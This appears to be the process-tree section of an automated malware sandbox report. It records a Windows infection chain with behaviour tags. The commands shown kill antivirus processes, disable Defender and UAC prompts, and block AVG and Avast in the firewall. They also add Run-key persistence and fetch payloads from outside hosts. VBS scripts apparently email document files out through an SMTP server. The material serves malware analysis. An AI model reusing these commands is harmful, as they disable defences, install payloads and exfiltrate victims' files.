        C:\Windows\system32\sc.exe
        
        sc delete UxSms
        10⤵
        Launches sc.exe
        
        PID:1900
        
        C:\Windows\system32\sc.exe
        
        sc stop WerSvc
        10⤵
        Launches sc.exe
        
        PID:4976
        
        C:\Windows\system32\sc.exe
        
        sc config WerSvc start= disabled
        10⤵
        Launches sc.exe
        
        PID:4304
        
        C:\Windows\system32\sc.exe
        
        sc stop "MBAMService"
        10⤵
        Launches sc.exe
        
        PID:3492
        
        C:\Windows\system32\sc.exe
        
        sc config "MBAMService" start= disabled
        10⤵
        Launches sc.exe
        
        PID:3244
        
        C:\Windows\system32\taskkill.exe
        
        Taskkill /im msseces.exe /f
        10⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2960
        
        C:\Windows\system32\taskkill.exe
        
        TASKKILL /F /IM MSASCui.exe
        10⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4976
        
        C:\Windows\system32\taskkill.exe
        
        TASKKILL /F /IM ByteFence.exe
        10⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5128
        
        C:\Windows\system32\sc.exe
        
        sc stop "rtop"
        10⤵
        Launches sc.exe
        
        PID:5172
        
        C:\Windows\system32\sc.exe
        
        sc config "rtop" start= disabled
        10⤵
        Launches sc.exe
        
        PID:5184
        
        C:\Windows\system32\sc.exe
        
        sc delete "rtop"
        10⤵
        Launches sc.exe
        
        PID:5200
        
        C:\Windows\system32\reg.exe
        
        reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v MSC
        10⤵
        
        PID:5216
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 00000000 /f
        10⤵
        UAC bypass
        
        PID:5232
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v AutoShareWKS /t REG_DWORD /d 00000001 /f
        10⤵
        
        PID:5248
        
        C:\Windows\System32\msiexec.exe
        
        C:\Windows\System32\msiexec.exe /x {8F023021-A7EB-45D3-9269-D65264C81729} /quiet
        10⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5264
        
        C:\Windows\SysWOW64\java\kvdb.x64.exe
        
        kvdb.x64.exe
        8⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in System32 directory
        
        PID:5372
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AA59.tmp\kvdb.bat" "
        9⤵
        
        PID:5516
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableRealtimeMonitoring $true
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5624
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -ThreatIDDefaultAction_Actions NoAction
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5756
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -SubmitSamplesConsent NeverSend
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5948
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Windows\java"
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:6088
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Windows\SysWOW64\java"
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5184
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Windows\System32"
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5292
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Windows\SysWOW64"
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5616
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Windows\SysWOW64\xml"
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5656
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\CrashReports\Java"
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5764
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1900
        
        C:\Windows\system32\netsh.exe
        
        Netsh.exe advfirewall firewall add rule name="F-Av" program="C:\Program Files (x86)\AVG\avgsetupx.exe" protocol=any dir=in enable=yes action=block profile=any
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:5092
        
        C:\Windows\system32\netsh.exe
        
        Netsh.exe advfirewall firewall add rule name="F-Av" program="C:\Program Files (x86)\AVG\avgsetupx.exe" protocol=any dir=out enable=yes action=block profile=any
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:6120
        
        C:\Windows\system32\netsh.exe
        
        Netsh.exe advfirewall firewall add rule name="F-Av" program="C:\Program Files (x86)\AVG\avgmfapx.exe" protocol=any dir=in enable=yes action=block profile=any
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:2696
        
        C:\Windows\system32\netsh.exe
        
        Netsh.exe advfirewall firewall add rule name="F-Av" program="C:\Program Files (x86)\AVG\avgmfapx.exe" protocol=any dir=out enable=yes action=block profile=any
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:5220
        
        C:\Windows\system32\netsh.exe
        
        Netsh.exe advfirewall firewall add rule name="F-Av" program="C:\Program Files\AVG\avgsetupx.exe" protocol=any dir=in enable=yes action=block profile=any
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:5288
        
        C:\Windows\system32\netsh.exe
        
        Netsh.exe advfirewall firewall add rule name="F-Av" program="C:\Program Files\AVG\avgsetupx.exe" protocol=any dir=out enable=yes action=block profile=any
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:5508
        
        C:\Windows\system32\netsh.exe
        
        Netsh.exe advfirewall firewall add rule name="F-Av" program="C:\Program Files\AVG\avgmfapx.exe" protocol=any dir=in enable=yes action=block profile=any
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:5368
        
        C:\Windows\system32\netsh.exe
        
        Netsh.exe advfirewall firewall add rule name="F-Av" program="C:\Program Files\AVG\avgmfapx.exe" protocol=any dir=out enable=yes action=block profile=any
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:4528
        
        C:\Windows\system32\netsh.exe
        
        Netsh.exe advfirewall firewall add rule name="F-Av" program="C:\Program Files (x86)\AVG\Av\avgmfapx.exe" protocol=any dir=in enable=yes action=block profile=any
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:5716
        
        C:\Windows\system32\netsh.exe
        
        Netsh.exe advfirewall firewall add rule name="F-Av" program="C:\Program Files (x86)\AVG\Av\avgmfapx.exe" protocol=any dir=out enable=yes action=block profile=any
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:3336
        
        C:\Windows\system32\netsh.exe
        
        Netsh.exe advfirewall firewall add rule name="F-Av" program="C:\Program Files (x86)\AVG\Setup\avgsetupx.exe" protocol=any dir=in enable=yes action=block profile=any
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:2784
        
        C:\Windows\system32\netsh.exe
        
        Netsh.exe advfirewall firewall add rule name="F-Av" program="C:\Program Files (x86)\AVG\Setup\avgsetupx.exe" protocol=any dir=out enable=yes action=block profile=any
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:5744
        
        C:\Windows\system32\netsh.exe
        
        Netsh.exe advfirewall firewall add rule name="F-Av" program="C:\Program Files\AVG\Av\avgmfapx.exe" protocol=any dir=in enable=yes action=block profile=any
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:5640
        
        C:\Windows\system32\netsh.exe
        
        Netsh.exe advfirewall firewall add rule name="F-Av" program="C:\Program Files\AVG\Av\avgmfapx.exe" protocol=any dir=out enable=yes action=block profile=any
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:5844
        
        C:\Windows\system32\netsh.exe
        
        Netsh.exe advfirewall firewall add rule name="F-Av" program="C:\Program Files\AVG\Setup\avgsetupx.exe" protocol=any dir=in enable=yes action=block profile=any
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:6044
        
        C:\Windows\system32\netsh.exe
        
        Netsh.exe advfirewall firewall add rule name="F-Av" program="C:\Program Files\AVG\Setup\avgsetupx.exe" protocol=any dir=out enable=yes action=block profile=any
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:5780
        
        C:\Windows\system32\netsh.exe
        
        Netsh.exe advfirewall firewall add rule name="F-Av" program="C:\Program Files (x86)\AVG\Antivirus\avgmfapx.exe" protocol=any dir=in enable=yes action=block profile=any
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:5956
        
        C:\Windows\system32\netsh.exe
        
        Netsh.exe advfirewall firewall add rule name="F-Av" program="C:\Program Files (x86)\AVG\Antivirus\avgmfapx.exe" protocol=any dir=out enable=yes action=block profile=any
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:1324
        
        C:\Windows\system32\netsh.exe
        
        Netsh.exe advfirewall firewall add rule name="F-Av" program="C:\Program Files (x86)\AVG\Setup\avgsetupx.exe" protocol=any dir=in enable=yes action=block profile=any
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:5176
        
        C:\Windows\system32\netsh.exe
        
        Netsh.exe advfirewall firewall add rule name="F-Av" program="C:\Program Files (x86)\AVG\Setup\avgsetupx.exe" protocol=any dir=out enable=yes action=block profile=any
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:4920
        
        C:\Windows\system32\netsh.exe
        
        Netsh.exe advfirewall firewall add rule name="F-Av" program="C:\Program Files\AVG\Antivirus\avgmfapx.exe" protocol=any dir=in enable=yes action=block profile=any
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:1968
        
        C:\Windows\system32\netsh.exe
        
        Netsh.exe advfirewall firewall add rule name="F-Av" program="C:\Program Files\AVG\Antivirus\avgmfapx.exe" protocol=any dir=out enable=yes action=block profile=any
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:4704
        
        C:\Windows\system32\netsh.exe
        
        Netsh.exe advfirewall firewall add rule name="F-Av" program="C:\Program Files\AVG\Setup\avgsetupx.exe" protocol=any dir=in enable=yes action=block profile=any
        10⤵
        Modifies Windows Firewall
        
        PID:2740
        
        C:\Windows\system32\netsh.exe
        
        Netsh.exe advfirewall firewall add rule name="F-Av" program="C:\Program Files\AVG\Setup\avgsetupx.exe" protocol=any dir=out enable=yes action=block profile=any
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:6108
        
        C:\Windows\system32\netsh.exe
        
        Netsh.exe advfirewall firewall add rule name="F-Av" program="C:\Program Files (x86)\AVAST Software\Avast\setup\instup.exe" protocol=any dir=in enable=yes action=block profile=any
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:4500
        
        C:\Windows\system32\netsh.exe
        
        Netsh.exe advfirewall firewall add rule name="F-Av" program="C:\Program Files (x86)\AVAST Software\Avast\setup\instup.exe" protocol=any dir=out enable=yes action=block profile=any
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:6124
        
        C:\Windows\system32\netsh.exe
        
        Netsh.exe advfirewall firewall add rule name="F-Av" program="C:\Program Files (x86)\AVAST Software\Avast\AvastSvc.exe" protocol=any dir=in enable=yes action=block profile=any
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:5204
        
        C:\Windows\system32\netsh.exe
        
        Netsh.exe advfirewall firewall add rule name="F-Av" program="C:\Program Files (x86)\AVAST Software\Avast\AvastSvc.exe" protocol=any dir=out enable=yes action=block profile=any
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:5284
        
        C:\Windows\system32\netsh.exe
        
        Netsh.exe advfirewall firewall add rule name="F-Av" program="C:\Program Files (x86)\AVAST Software\Avast\avastui.exe" protocol=any dir=in enable=yes action=block profile=any
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:5592
        
        C:\Windows\system32\netsh.exe
        
        Netsh.exe advfirewall firewall add rule name="F-Av" program="C:\Program Files (x86)\AVAST Software\Avast\avastui.exe" protocol=any dir=out enable=yes action=block profile=any
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:3004
        
        C:\Windows\system32\netsh.exe
        
        Netsh.exe advfirewall firewall add rule name="F-Av" program="C:\Program Files\AVAST Software\Avast\setup\instup.exe" protocol=any dir=out enable=yes action=block profile=any
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:4660
        
        C:\Windows\system32\netsh.exe
        
        Netsh.exe advfirewall firewall add rule name="F-Av" program="C:\Program Files\AVAST Software\Avast\setup\instup.exe" protocol=any dir=in enable=yes action=block profile=any
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:6072
        
        C:\Windows\system32\netsh.exe
        
        Netsh.exe advfirewall firewall add rule name="F-Av" program="C:\Program Files\AVAST Software\Avast\AvastSvc.exe" protocol=any dir=in enable=yes action=block profile=any
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:5384
        
        C:\Windows\system32\netsh.exe
        
        Netsh.exe advfirewall firewall add rule name="F-Av" program="C:\Program Files\AVAST Software\Avast\AvastSvc.exe" protocol=any dir=out enable=yes action=block profile=any
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:5612
        
        C:\Windows\system32\netsh.exe
        
        Netsh.exe advfirewall firewall add rule name="F-Av" program="C:\Program Files\AVAST Software\Avast\avastui.exe" protocol=any dir=in enable=yes action=block profile=any
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:5160
        
        C:\Windows\system32\netsh.exe
        
        Netsh.exe advfirewall firewall add rule name="F-Av" program="C:\Program Files\AVAST Software\Avast\avastui.exe" protocol=any dir=out enable=yes action=block profile=any
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:5716
        
        C:\Windows\SysWOW64\java\acgst-12-qknci.exe
        
        acgst-12-qknci.exe
        8⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in System32 directory
        
        PID:5832
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EF80.tmp\(acgst-v12debknci').bat" "
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:5640
        
        C:\Windows\SysWOW64\java\github.exe
        
        github.exe 1 acgst-v12-terkunci.exe acgst-v12.exe @@AcgsTtwelve@@#
        10⤵
        Executes dropped EXE
        Drops file in System32 directory
        
        PID:5872
        
        C:\Windows\SysWOW64\java\acgst-v12.exe
        
        acgst-v12.exe
        10⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in System32 directory
        
        PID:5736
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\F1C2.tmp\acgst-12®.bat" "
        11⤵
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        
        PID:3236
        
        C:\Windows\SysWOW64\reg.exe
        
        reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v SmartAudioFilterAgent /f
        12⤵
        
        PID:4452
        
        C:\Windows\SysWOW64\reg.exe
        
        reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run32 /v SmartAudioFilterAgent /f
        12⤵
        System Location Discovery: System Language Discovery
        
        PID:624
        
        C:\Windows\SysWOW64\reg.exe
        
        reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v SmartAudioFilterAgent /f /reg:64
        12⤵
        System Location Discovery: System Language Discovery
        
        PID:2208
        
        C:\Windows\SysWOW64\reg.exe
        
        reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run32 /v SmartAudioFilterAgent /f /reg:64
        12⤵
        System Location Discovery: System Language Discovery
        
        PID:1968
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v SmartAudioFilterAgent /t REG_SZ /d C:\Windows\java\audiocheck.exe /f
        12⤵
        Adds Run key to start application
        
        PID:5648
        
        C:\Windows\SysWOW64\reg.exe
        
        reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v WindowsTask /f
        12⤵
        
        PID:4048
        
        C:\Windows\SysWOW64\reg.exe
        
        reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run32 /v WindowsTask /f
        12⤵
        
        PID:5092
        
        C:\Windows\SysWOW64\reg.exe
        
        reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v WindowsTask /f /reg:64
        12⤵
        System Location Discovery: System Language Discovery
        
        PID:1676
        
        C:\Windows\SysWOW64\reg.exe
        
        reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run32 /v WindowsTask /f /reg:64
        12⤵
        
        PID:5252
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v WindowsTask /t REG_SZ /d C:\Windows\java\taskhosts.exe /f
        12⤵
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        
        PID:6096
        
        C:\Users\Admin\AppData\Local\Temp\getapcc-v+.exe
        
        "C:\Users\Admin\AppData\Local\Temp\getapcc-v+" --user-agent="Iphone Firefox/3.3.3" -N --tries=77 --read-timeout=300 http://ipm.biz.id/getapcc++/default.php
        12⤵
        Executes dropped EXE
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        
        PID:5128
        
        C:\Users\Admin\AppData\Local\Temp\getapcc-v+.exe
        
        "C:\Users\Admin\AppData\Local\Temp\getapcc-v+" --user-agent="Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.3) Gecko/2008092416 Firefox/3.0.3" -N --tries=77 --read-timeout=300 http://otwalkun.16mb.com/getapcc-v2/default.php-old
        12⤵
        Executes dropped EXE
        
        PID:5284
        
        C:\Windows\SysWOW64\java\taskhosts.exe
        
        taskhosts.exe
        12⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:5084
        
        C:\Windows\java\serviceapple.exe
        
        "C:\Windows\java\serviceapple.exe"
        13⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:5384
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1AD6.tmp\applet+bknci'.bat" "
        14⤵
        
        PID:5456
        
        C:\Windows\java\skrip.exe
        
        skrip.exe 1 applet+terkunci.exe appleprocess.exe @12345#a
        15⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:6052
        
        C:\Windows\java\appleprocess.exe
        
        appleprocess.exe
        15⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:5992
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1BE0.tmp\ServiceLocalNet.bat" "
        16⤵
        
        PID:4048
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 1 8.8.8.8
        17⤵
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5180
        
        C:\Windows\SysWOW64\find.exe
        
        find "TTL="
        17⤵
        System Location Discovery: System Language Discovery
        
        PID:4356
        
        C:\Windows\java\get.exe
        
        get --user-agent="Iphone Firefox/3.3.3" -N --tries=77 --read-timeout=300 http://ipm.biz.id/alkunfresh++/audiocheck.php
        17⤵
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:428
        
        C:\Windows\java\get.exe
        
        get --user-agent="Iphone Firefox/3.3.3" -N --tries=77 --read-timeout=300 http://ipm.biz.id/alkunfresh++/taskhosts.php
        17⤵
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:5700
        
        C:\Windows\SysWOW64\java\handler+.exe
        
        handler+.exe
        12⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in System32 directory
        
        PID:5720
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1B05.tmp\handler+.bat" "
        13⤵
        System Location Discovery: System Language Discovery
        
        PID:5836
        
        C:\Windows\SysWOW64\java\handlersuperdat.exe
        
        handlersuperdat.exe
        14⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        
        PID:5708
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1BA1.tmp\handlersuperdat.bat" "
        15⤵
        Drops file in System32 directory
        
        PID:1968
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +h "superdat" /s /d
        16⤵
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Views/modifies file attributes
        
        PID:3080
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "superdat\-" /reset
        16⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:6112
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "superdat\-" /inheritance:d
        16⤵
        Possible privilege escalation attempt
        Modifies file permissions
        System Location Discovery: System Language Discovery
        
        PID:6100
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "superdat\-" /remove:g Admin /t /c
        16⤵
        Possible privilege escalation attempt
        Modifies file permissions
        System Location Discovery: System Language Discovery
        
        PID:4544
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "superdat\-" /remove:g Administrators /t /c
        16⤵
        Possible privilege escalation attempt
        Modifies file permissions
        System Location Discovery: System Language Discovery
        
        PID:4696
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "superdat\-" /reset
        14⤵
        Possible privilege escalation attempt
        Modifies file permissions
        System Location Discovery: System Language Discovery
        
        PID:628
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "superdat\-" /grant:r Administrators:(OI)(RC,RX,M)
        14⤵
        Possible privilege escalation attempt
        Modifies file permissions
        System Location Discovery: System Language Discovery
        
        PID:736
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "superdat\-" /grant:r Admin:(OI)(RC,RX,M)
        14⤵
        Possible privilege escalation attempt
        Modifies file permissions
        System Location Discovery: System Language Discovery
        
        PID:2124
        
        C:\Windows\SysWOW64\java\superdat\-\superdat.exe
        
        superdat.exe
        14⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in System32 directory
        
        PID:1844
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1D95.tmp\superdat.bat" "
        15⤵
        Drops file in System32 directory
        
        PID:4012
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 1 8.8.8.8
        16⤵
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5184
        
        C:\Windows\SysWOW64\find.exe
        
        find "TTL="
        16⤵
        
        PID:5020
        
        C:\Windows\SysWOW64\systeminfo.exe
        
        systeminfo.exe
        16⤵
        System Location Discovery: System Language Discovery
        Gathers system information
        
        PID:412
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /B /C:"OS Name" /C:"System Type" /C:"Host Name"
        16⤵
        System Location Discovery: System Language Discovery
        
        PID:2424
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" type "C:\Users\Admin\AppData\Local\Temp\systeminfo-x64-or-x86-based.custom.txt" "
        16⤵
        System Location Discovery: System Language Discovery
        
        PID:5472
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr "x64-based"
        16⤵
        System Location Discovery: System Language Discovery
        
        PID:5608
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +h C:\Users\Admin\AppData\Roaming
        16⤵
        Views/modifies file attributes
        
        PID:5476
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript.exe /nologo "time-1.vbs" [email protected] [email protected] "Admin" "superdata GYHASOLS Ddocx+xlsx+json smtp*smtp2love*mywire*org" smtp.smtp2love.mywire.org [email protected] [email protected]
        16⤵
        System Location Discovery: System Language Discovery
        
        PID:5560
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        16⤵
        Delays execution with timeout.exe
        
        PID:5816
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript.exe /nologo "time-2.vbs" [email protected] [email protected] "Admin" "superdata GYHASOLS Edocx+xlsx+json smtp*smtp2love*mywire*org" smtp.smtp2love.mywire.org [email protected] [email protected]
        16⤵
        System Location Discovery: System Language Discovery
        
        PID:5500
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        16⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:5816
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript.exe /nologo "time-3.vbs" [email protected] [email protected] "Admin" "superdata GYHASOLS DTxt smtp*smtp2love*mywire*org" smtp.smtp2love.mywire.org [email protected] [email protected]
        16⤵
        
        PID:5392
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        16⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:5520
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript.exe /nologo "time-4.vbs" [email protected] [email protected] "Admin" "superdata GYHASOLS ETxt smtp*smtp2love*mywire*org" smtp.smtp2love.mywire.org [email protected] [email protected]
        16⤵
        System Location Discovery: System Language Discovery
        
        PID:4516
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        16⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:368
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript.exe /nologo "time-5.vbs" [email protected] [email protected] "Admin" "superdata GYHASOLS Fdocx+xlsx+json smtp*smtp2love*mywire*org" smtp.smtp2love.mywire.org [email protected] [email protected]
        16⤵
        System Location Discovery: System Language Discovery
        
        PID:4696
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        16⤵
        Delays execution with timeout.exe
        
        PID:6124
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript.exe /nologo "time-6.vbs" [email protected] [email protected] "Admin" "superdata GYHASOLS Ftxt smtp*smtp2love*mywire*org" smtp.smtp2love.mywire.org [email protected] [email protected]
        16⤵
        
        PID:1492
        
        C:\Windows\SysWOW64\timeout.exe
        
